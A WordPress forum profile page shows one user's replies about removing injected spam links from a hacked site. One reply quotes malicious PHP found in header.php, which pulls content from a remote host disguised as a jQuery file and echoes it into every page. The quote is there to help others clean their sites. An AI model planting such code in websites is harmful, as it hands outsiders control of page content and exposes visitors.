ms9988
Forum Replies Created
Viewing 6 replies - 1 through 6 (of 6 total)
-
Forum: Fixing WordPress
In reply to: Cannot Upload Thumbnails For Product CategoriesThankyou. I will ask there.
Forum: Fixing WordPress
In reply to: How to remove this codeThankyou. i have removed it.
Forum: Fixing WordPress
In reply to: How to remove this codeI have found the code in “index.php” file and i removed it. i found this by a plugin called “String Locator”.
But i am still curious to know that what safety measures i can take to protect my files..
Regards
Forum: Fixing WordPress
In reply to: How to remove this codeThanks all for the suggestions. I have tried all but it nothing worked.
I have deactivated all the plugins, theme changed to twenty seventeen, but the link is still there..
anything else which i can try? can someone guide me in coding? i will remove this code manually.
Regards.
Forum: Fixing WordPress
In reply to: How to remove this codethis is the text of hyperlink: “Phil McConkey Womens Jersey”
Forum: Fixing WordPress
In reply to: Error Message: Couldn't connect to database server.thanks for your suggestions. i was also getting the same message but it has resolve now!
Remove the code from Header.php
<?php if(function_exists('curl_init')) { $url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; } ?>
Viewing 6 replies - 1 through 6 (of 6 total)